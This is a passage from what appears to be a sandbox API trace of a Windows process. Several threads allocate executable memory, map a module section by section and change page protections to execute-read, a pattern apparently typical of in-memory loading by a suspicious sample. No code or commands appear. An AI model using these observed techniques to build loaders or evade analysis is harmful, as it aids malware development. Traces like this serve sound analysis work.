returned 0x1e7 [0172.189] SetLastError (dwErrCode=0x1e7) [0172.189] GetLastError () returned 0x1e7 [0172.189] SetLastError (dwErrCode=0x1e7) [0172.189] VirtualProtect (in: lpAddress=0x27b4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x2caf754 | out: lpflOldProtect=0x2caf754*=0x4) returned 1 [0172.190] GetLastError () returned 0x1e7 [0172.190] SetLastError (dwErrCode=0x1e7) [0172.190] GetLastError () returned 0x1e7 [0172.190] SetLastError (dwErrCode=0x1e7) [0172.190] GetLastError () returned 0x1e7 [0172.190] SetLastError (dwErrCode=0x1e7) [0172.190] VirtualProtect (in: lpAddress=0x27b5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x2caf754 | out: lpflOldProtect=0x2caf754*=0x4) returned 1 [0172.190] GetLastError () returned 0x1e7 [0172.190] SetLastError (dwErrCode=0x1e7) [0172.190] GetLastError () returned 0x1e7 [0172.190] SetLastError (dwErrCode=0x1e7) [0172.190] GetLastError () returned 0x1e7 [0172.191] SetLastError (dwErrCode=0x1e7) [0172.191] VirtualFree (lpAddress=0x27b6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0172.194] GetLastError () returned 0x1e7 [0172.194] SetLastError (dwErrCode=0x1e7) [0172.194] GetLastError () returned 0x1e7 [0172.194] SetLastError (dwErrCode=0x1e7) [0172.194] GetLastError () returned 0x1e7 [0172.194] SetLastError (dwErrCode=0x1e7) [0172.566] strlen (_Str="pthr_last_shmem") returned 0xf [0172.566] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-pthr_last_shmem") returned 0x608 [0172.567] WaitForSingleObject (hHandle=0x608, dwMilliseconds=0xffffffff) returned 0x0 [0172.567] FindAtomA (lpString="gcc-shmem-tdm2-pthr_last_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0172.567] malloc (_Size=0x4) returned 0x3a2d58 [0172.567] AddAtomA (lpString="gcc-shmem-tdm2-pthr_last_shmem-aaaaaaaaaaaAAAaAaaaAaAAaAaAaAAaa") returned 0xc017 [0172.567] GetAtomNameA (in: nAtom=0xc017, lpBuffer=0x2cafb08, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-pthr_last_shmem-aaaaaaaaaaaAAAaAaaaAaAAaAaAaAAa") returned 0x3e [0172.567] ReleaseMutex (hMutex=0x608) returned 1 [0172.567] CloseHandle (hObject=0x608) returned 1 [0172.567] GetCurrentThreadId () returned 0xe7c [0172.567] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0172.567] malloc (_Size=0x5f5e100) returned 0x2e10020 [0175.952] GetLastError () returned 0x1e7 [0175.952] SetLastError (dwErrCode=0x1e7) Thread: id = 134 os_tid = 0xebc [0231.206] malloc (_Size=0x5f5e100) returned 0x2e10020 [0232.912] atoi (_Str="64") returned 64 [0232.912] atoi (_Str="8192") returned 8192 [0232.912] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2460000 [0232.916] malloc (_Size=0x3afd) returned 0x206df60 [0232.916] malloc (_Size=0x3afd) returned 0x2071b68 [0232.927] GetLastError () returned 0x0 [0232.927] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0232.927] GetCurrentThreadId () returned 0xebc [0232.927] calloc (_Count=0x1, _Size=0xc0) returned 0x2057930 [0232.927] GetCurrentThreadId () returned 0xebc [0232.927] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0232.927] GetCurrentThreadId () returned 0xebc [0232.927] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2f0 [0232.927] GetCurrentProcess () returned 0xffffffff [0232.927] GetCurrentThread () returned 0xfffffffe [0232.927] GetCurrentProcess () returned 0xffffffff [0232.927] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x2057944, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2057944*=0x2f4) returned 1 [0232.927] GetThreadPriority (hThread=0x2f4) returned 0 [0232.927] SetLastError (dwErrCode=0x0) [0232.927] GetLastError () returned 0x0 [0232.927] realloc (_Block=0x0, _Size=0x4) returned 0x3a2d78 [0232.927] realloc (_Block=0x0, _Size=0x1) returned 0x3a2d88 [0232.927] SetLastError (dwErrCode=0x0) [0232.927] GetNativeSystemInfo (in: lpSystemInfo=0x2dbf37c | out: lpSystemInfo=0x2dbf37c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0232.928] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0232.928] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2490000 [0232.928] GetProcessHeap () returned 0x530000 [0232.928] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2b5fea8 [0232.928] VirtualAlloc (lpAddress=0x2490000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2490000 [0232.929] VirtualAlloc (lpAddress=0x2491000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2491000 [0232.931] VirtualAlloc (lpAddress=0x24b4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x24b4000 [0232.931] VirtualAlloc (lpAddress=0x24b5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x24b5000 [0232.932] VirtualAlloc (lpAddress=0x24b6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x24b6000 [0232.932] GetLastError () returned 0x1e7 [0232.932] SetLastError (dwErrCode=0x1e7) [0232.932] GetLastError () returned 0x1e7 [0232.932] SetLastError (dwErrCode=0x1e7) [0232.932] GetLastError () returned 0x1e7 [0232.932] SetLastError (dwErrCode=0x1e7) [0232.932] GetLastError () returned 0x1e7 [0232.932] SetLastError (dwErrCode=0x1e7) [0232.932] VirtualProtect (in: lpAddress=0x2491000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x2dbf254 | out: lpflOldProtect=0x2dbf254*=0x4) returned 1 [0232.980] GetLastError () returned 0x1e7 [0232.980] SetLastError (dwErrCode=0x1e7) [0232.980] GetLastError () returned 0x1e7 [0232.981] SetLastError (dwErrCode=0x1e7) [0232.981] GetLastError () returned 0x1e7 [0232.981] SetLastError (dwErrCode=0x1e7) [0232.981] VirtualProtect (in: lpAddress=0x24b4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x2dbf254 | out: lpflOldProtect=0x2dbf254*=0x4) returned 1 [0232.981] GetLastError () returned 0x1e7 [0232.982] SetLastError (dwErrCode=0x1e7) [0232.982] GetLastError () returned 0x1e7 [0232.982] SetLastError (dwErrCode=0x1e7) [0232.982] GetLastError () returned 0x1e7 [0232.982] SetLastError (dwErrCode=0x1e7) [0232.982] VirtualProtect (in: lpAddress=0x24b5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x2dbf254 | out: lpflOldProtect=0x2dbf254*=0x4) returned 1 [0232.982] GetLastError () returned 0x1e7 [0232.982] SetLastError (dwErrCode=0x1e7) [0232.982] GetLastError () returned 0x1e7 [0232.982] SetLastError (dwErrCode=0x1e7) [0232.982] GetLastError () returned 0x1e7 [0232.982] SetLastError (dwErrCode=0x1e7) [0232.982] VirtualFree (lpAddress=0x24b6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0232.985] GetLastError () returned 0x1e7 [0232.985] SetLastError (dwErrCode=0x1e7) [0232.985] GetLastError () returned 0x1e7 [0232.985] SetLastError (dwErrCode=0x1e7) [0232.986] GetLastError () returned 0x1e7 [0232.986] SetLastError (dwErrCode=0x1e7) [0302.934] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0302.935] GetCurrentThreadId () returned 0xebc [0302.935] GetCurrentThreadId () returned 0xebc [0302.935] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0302.935] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0302.935] GetCurrentThreadId () returned 0xebc [0302.935] ReleaseSemaphore (in: hSemaphore=0x144, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0302.935] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0xffffffff) returned 0x0 [0302.935] GetCurrentThreadId () returned 0xebc [0302.935] ReleaseSemaphore (in: hSemaphore=0x148, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0302.935] CloseHandle (hObject=0x2f4) returned 1 [0302.935] CloseHandle (hObject=0x2f0) returned 1 [0302.935] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0302.936] GetCurrentThreadId () returned 0xebc [0302.936] free (_Block=0x3a2d78) [0302.936] free (_Block=0x3a2d88) [0302.936] GetCurrentThreadId () returned 0xebc [0302.936] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0302.936] malloc (_Size=0x5f5e100) returned 0x2f50020 [0304.256] free (_Block=0x2f50020) [0304.778] atoi (_Str="64") returned 64 [0304.778] atoi (_Str="8192") returned 8192 [0304.778] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2630000 [0304.780] malloc (_Size=0x3afd) returned 0x2084790 [0304.780] malloc (_Size=0x3afd) returned 0x2088398 [0304.790] GetLastError () returned 0x0 [0304.790] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0304.790] GetCurrentThreadId () returned 0xebc [0304.790] GetCurrentThreadId () returned 0xebc [0304.790] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0304.790] GetCurrentThreadId () returned 0xebc [0304.790] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2f0 [0304.791] GetCurrentProcess () returned 0xffffffff [0304.791] GetCurrentThread () returned 0xfffffffe [0304.791] GetCurrentProcess () returned 0xffffffff [0304.791] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x2057944, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2057944*=0x2f4) returned 1 [0304.791] GetThreadPriority (hThread=0x2f4) returned 0 [0304.791] SetLastError (dwErrCode=0x0) [0304.791] GetLastError () returned 0x0 [0304.791] realloc (_Block=0x0, _Size=0x4) returned 0x3a2d88 [0304.791] realloc (_Block=0x0, _Size=0x1) returned 0x3a2d78 [0304.791] SetLastError (dwErrCode=0x0) [0304.791] GetNativeSystemInfo (in: lpSystemInfo=0x2dbf4e0 | out: lpSystemInfo=0x2dbf4e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0304.791] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0304.791] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2890000 [0304.792] GetProcessHeap () returned 0x530000 [0304.792] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2a839e0 [0304.792] VirtualAlloc (lpAddress=0x2890000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2890000 [0304.792] VirtualAlloc (lpAddress=0x2891000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2891000 [0304.795] VirtualAlloc (lpAddress=0x28b4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x28b4000 [0304.795] VirtualAlloc (lpAddress=0x28b5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x28b5000 [0304.795] VirtualAlloc (lpAddress=0x28b6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x28b6000 [0304.796] GetLastError () returned 0x1e7 [0304.796] SetLastError (dwErrCode=0x1e7) [0304.796] GetLastError () returned 0x1e7 [0304.796] SetLastError (dwErrCode=0x1e7) [0304.796] GetLastError () returned 0x1e7 [0304.796] SetLastError (dwErrCode=0x1e7) [0304.796] GetLastError () returned 0x1e7 [0304.796] SetLastError (dwErrCode=0x1e7) [0304.796] VirtualProtect (in: lpAddress=0x2891000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x2dbf3b8 | out: lpflOldProtect=0x2dbf3b8*=0x4) returned 1 [0304.800] GetLastError () returned 0x1e7 [0304.800] SetLastError (dwErrCode=0x1e7) [0304.800] GetLastError () returned 0x1e7 [0304.800] SetLastError (dwErrCode=0x1e7) [0304.800] GetLastError () returned 0x1e7 [0304.800] SetLastError (dwErrCode=0x1e7) [0304.800] VirtualProtect (in: lpAddress=0x28b4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x2dbf3b8 | out: lpflOldProtect=0x2dbf3b8*=0x4) returned 1 [0304.800] GetLastError () returned 0x1e7 [0304.800] SetLastError (dwErrCode=0x1e7) [0304.800] GetLastError () returned 0x1e7 [0304.800] SetLastError (dwErrCode=0x1e7) [0304.800] GetLastError () returned 0x1e7 [0304.800] SetLastError (dwErrCode=0x1e7) [0304.801] VirtualProtect (in: lpAddress=0x28b5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x2dbf3b8 | out: lpflOldProtect=0x2dbf3b8*=0x4) returned 1 [0304.801] GetLastError () returned 0x1e7 [0304.801] SetLastError (dwErrCode=0x1e7) [0304.801] GetLastError () returned 0x1e7 [0304.801] SetLastError (dwErrCode=0x1e7) [0304.801] GetLastError () returned 0x1e7 [0304.801] SetLastError (dwErrCode=0x1e7) [0304.801] VirtualFree (lpAddress=0x28b6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0304.804] GetLastError () returned 0x1e7 [0304.804] SetLastError (dwErrCode=0x1e7) [0304.804] GetLastError () returned 0x1e7 [0304.804] SetLastError (dwErrCode=0x1e7) [0304.804] GetLastError () returned 0x1e7 [0304.804] SetLastError (dwErrCode=0x1e7) Thread: id = 135 os_tid = 0xec0 [0233.405] malloc (_Size=0x5f5e100) returned 0x2f50020 [0235.121] atoi (_Str="64") returned 64 [0235.121] atoi (_Str="8192") returned 8192 [0235.121] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2540000 [0235.125] malloc (_Size=0x3afd) returned 0x2075770 [0235.125] malloc (_Size=0x3afd) returned 0x2079378 [0235.138] GetLastError () returned 0x0 [0235.138] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0235.139] GetCurrentThreadId () returned 0xec0 [0235.139] calloc (_Count=0x1, _Size=0xc0) returned 0x20579f8 [0235.139] GetCurrentThreadId () returned 0xec0 [0235.139] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0235.139] GetCurrentThreadId () returned 0xec0 [0235.139] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x624 [0235.139] GetCurrentProcess () returned 0xffffffff [0235.139] GetCurrentThread () returned 0xfffffffe [0235.139] GetCurrentProcess () returned 0xffffffff [0235.139] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x2057a0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2057a0c*=0x654) returned 1 [0235.139] GetThreadPriority (hThread=0x654) returned 0 [0235.140] SetLastError (dwErrCode=0x0) [0235.140] GetLastError () returned 0x0 [0235.140] realloc (_Block=0x0, _Size=0x4) returned 0x3a2d98 [0235.140] realloc (_Block=0x0, _Size=0x1) returned 0x3a2da8 [0235.140] SetLastError (dwErrCode=0x0) [0235.140] GetNativeSystemInfo (in: lpSystemInfo=0x2f4fa6c | out: lpSystemInfo=0x2f4fa6c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0235.140] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0235.140] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2c70000 [0235.141] GetProcessHeap () returned 0x530000 [0235.141] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2a83920 [0235.141] VirtualAlloc (lpAddress=0x2c70000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2c70000 [0235.141] VirtualAlloc (lpAddress=0x2c71000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2c71000 [0235.146] VirtualAlloc (lpAddress=0x2c94000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2c94000 [0235.147] VirtualAlloc (lpAddress=0x2c95000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2c95000 [0235.147] VirtualAlloc (lpAddress=0x2c96000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2c96000 [0235.147] GetLastError () returned 0x1e7 [0235.148] SetLastError (dwErrCode=0x1e7) [0235.148] GetLastError () returned 0x1e7 [0235.148] SetLastError (dwErrCode=0x1e7) [0235.148] GetLastError () returned 0x1e7 [0235.148] SetLastError (dwErrCode=0x1e7) [0235.148] GetLastError () returned 0x1e7 [0235.148] SetLastError (dwErrCode=0x1e7) [0235.148] VirtualProtect (in: lpAddress=0x2c71000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x2f4f944 | out: lpflOldProtect=0x2f4f944*=0x4) returned 1 [0235.152] GetLastError () returned 0x1e7 [0235.152] SetLastError (dwErrCode=0x1e7) [0235.153] GetLastError () returned 0x1e7 [0235.153] SetLastError (dwErrCode=0x1e7) [0235.153] GetLastError () returned 0x1e7 [0235.153] SetLastError (dwErrCode=0x1e7) [0235.153] VirtualProtect (in: lpAddress=0x2c94000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x2f4f944 | out: lpflOldProtect=0x2f4f944*=0x4) returned 1 [0235.153] GetLastError () returned 0x1e7 [0235.153] SetLastError (dwErrCode=0x1e7) [0235.153] GetLastError () returned 0x1e7 [0235.153] SetLastError (dwErrCode=0x1e7) [0235.153] GetLastError () returned 0x1e7 [0235.153] SetLastError (dwErrCode=0x1e7) [0235.153] VirtualProtect (in: lpAddress=0x2c95000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x2f4f944 | out: lpflOldProtect=0x2f4f944*=0x4) returned 1 [0235.154] GetLastError () returned 0x1e7 [0235.154] SetLastError (dwErrCode=0x1e7) [0235.154] GetLastError () returned 0x1e7 [0235.154] SetLastError (dwErrCode=0x1e7) [0235.154] GetLastError () returned 0x1e7 [0235.154] SetLastError (dwErrCode=0x1e7) [0235.154] VirtualFree (lpAddress=0x2c96000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0235.157] GetLastError () returned 0x1e7 [0235.157] SetLastError (dwErrCode=0x1e7) [0235.157] GetLastError () returned 0x1e7 [0235.157] SetLastError (dwErrCode=0x1e7) [0235.157] GetLastError () returned 0x1e7 [0235.157] SetLastError (dwErrCode=0x1e7) [0394.031] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0394.031] GetCurrentThreadId () returned 0xec0 [0394.031] GetCurrentThreadId () returned 0xec0 [0394.031] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0394.031] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0394.031] GetCurrentThreadId () returned 0xec0 [0394.031] ReleaseSemaphore (in: hSemaphore=0x144, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0394.031] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0xffffffff) returned 0x0 [0394.031] GetCurrentThreadId () returned 0xec0 [0394.031] ReleaseSemaphore (in: hSemaphore=0x148, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0394.031] CloseHandle (hObject=0x654) returned 1 [0394.032] CloseHandle (hObject=0x624) returned 1 [0394.032] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0394.032] GetCurrentThreadId () returned 0xec0 [0394.032] free (_Block=0x3a2d98) [0394.032] free (_Block=0x3a2da8) [0394.032] GetCurrentThreadId () returned 0xec0 [0394.032] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0394.032] malloc (_Size=0x5f5e100) returned 0x3110020 [0397.149] atoi (_Str="64") returned 64 [0397.150] atoi (_Str="8192") returned 8192 [0397.150] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2ee0000 [0397.154] malloc (_Size=0x3afd) returned 0x20937b0 [0397.154] malloc (_Size=0x3afd) returned 0x20973b8 [0397.170] GetLastError () returned 0x0 [0397.170] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0397.170] GetCurrentThreadId () returned 0xec0 [0397.170] GetCurrentThreadId () returned 0xec0 [0397.170] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0397.170] GetCurrentThreadId () returned 0xec0 [0397.171] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x624 [0397.171] GetCurrentProcess () returned 0xffffffff [0397.171] GetCurrentThread () returned 0xfffffffe [0397.171] GetCurrentProcess () returned 0xffffffff [0397.171] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x2057a0c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2057a0c*=0x654) returned 1 [0397.171] GetThreadPriority (hThread=0x654) returned 0 [0397.171] SetLastError (dwErrCode=0x0) [0397.171] GetLastError () returned 0x0 [0397.171] realloc (_Block=0x0, _Size=0x4) returned 0x3a2da8 [0397.171] realloc (_Block=0x0, _Size=0x1) returned 0x3a2d98 [0397.171] SetLastError (dwErrCode=0x0) [0397.171] GetNativeSystemInfo (in: lpSystemInfo=0x2f4fbd0 | out: lpSystemInfo=0x2f4fbd0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0397.171] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0397.171] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0397.172] GetProcessHeap () returned 0x530000 [0397.172] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2a83ae0 [0397.172] VirtualAlloc (lpAddress=0x2f50000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2f50000 [0397.173] VirtualAlloc (lpAddress=0x2f51000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2f51000 [0397.176] VirtualAlloc (lpAddress=0x2f74000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2f74000 [0397.176] VirtualAlloc (lpAddress=0x2f75000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2f75000 [0397.177] VirtualAlloc (lpAddress=0x2f76000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2f76000 [0397.177] GetLastError () returned 0x1e7 [0397.177] SetLastError (dwErrCode=0x1e7) [0397.177] GetLastError () returned 0x1e7 [0397.177] SetLastError (dwErrCode=0x1e7) [0397.177] GetLastError () returned 0x1e7 [0397.178] SetLastError (dwErrCode=0x1e7) [0397.178] GetLastError () returned 0x1e7 [0397.178] SetLastError (dwErrCode=0x1e7) [0397.178] VirtualProtect (in: lpAddress=0x2f51000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x2f4faa8 | out: lpflOldProtect=0x2f4faa8*=0x4) returned 1 [0397.184] GetLastError () returned 0x1e7 [0397.184] SetLastError (dwErrCode=0x1e7) [0397.184] GetLastError () returned 0x1e7 [0397.184] SetLastError (dwErrCode=0x1e7) [0397.184] GetLastError () returned 0x1e7 [0397.184] SetLastError (dwErrCode=0x1e7) [0397.184] VirtualProtect (in: lpAddress=0x2f74000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x2f4faa8 | out: lpflOldProtect=0x2f4faa8*=0x4) returned 1 [0397.184] GetLastError () returned 0x1e7 [0397.184] SetLastError (dwErrCode=0x1e7) [0397.184] GetLastError () returned 0x1e7 [0397.184] SetLastError (dwErrCode=0x1e7) [0397.184] GetLastError () returned 0x1e7 [0397.184] SetLastError (dwErrCode=0x1e7) [0397.184] VirtualProtect (in: lpAddress=0x2f75000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x2f4faa8 | out: lpflOldProtect=0x2f4faa8*=0x4) returned 1 [0397.185] GetLastError () returned 0x1e7 [0397.185] SetLastError (dwErrCode=0x1e7) [0397.185] GetLastError () returned 0x1e7 [0397.185] SetLastError (dwErrCode=0x1e7) [0397.185] GetLastError () returned 0x1e7 [0397.185] SetLastError (dwErrCode=0x1e7) [0397.185] VirtualFree (lpAddress=0x2f76000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0397.189] GetLastError () returned 0x1e7 [0397.189] SetLastError (dwErrCode=0x1e7) [0397.189] GetLastError () returned 0x1e7 [0397.189] SetLastError (dwErrCode=0x1e7) [0397.189] GetLastError () returned 0x1e7 [0397.189] SetLastError (dwErrCode=0x1e7) Thread: id = 138 os_tid = 0xeec [0326.532] malloc (_Size=0x5f5e100) returned 0x3110020 [0327.842] free (_Block=0x3110020) [0328.680] atoi (_Str="64") returned 64 [0328.680] atoi (_Str="8192") returned 8192 [0328.680] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2500000 [0328.684] malloc (_Size=0x3afd) returned 0x208bfa0 [0328.684] malloc (_Size=0x3afd) returned 0x208fba8 [0328.699] GetLastError () returned 0x0 [0328.699] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0328.699] GetCurrentThreadId () returned 0xeec [0328.699] calloc (_Count=0x1, _Size=0xc0) returned 0x3ada98 [0328.699] GetCurrentThreadId () returned 0xeec [0328.699] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0328.699] GetCurrentThreadId () returned 0xeec [0328.700] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x630 [0328.700] GetCurrentProcess () returned 0xffffffff [0328.700] GetCurrentThread () returned 0xfffffffe [0328.700] GetCurrentProcess () returned 0xffffffff [0328.700] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3adaac, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3adaac*=0x640) returned 1 [0328.700] GetThreadPriority (hThread=0x640) returned 0 [0328.700] SetLastError (dwErrCode=0x0) [0328.700] GetLastError () returned 0x0 [0328.701] realloc (_Block=0x0, _Size=0x4) returned 0x3a2db8 [0328.701] realloc (_Block=0x0, _Size=0x1) returned 0x3a2dc8 [0328.701] SetLastError 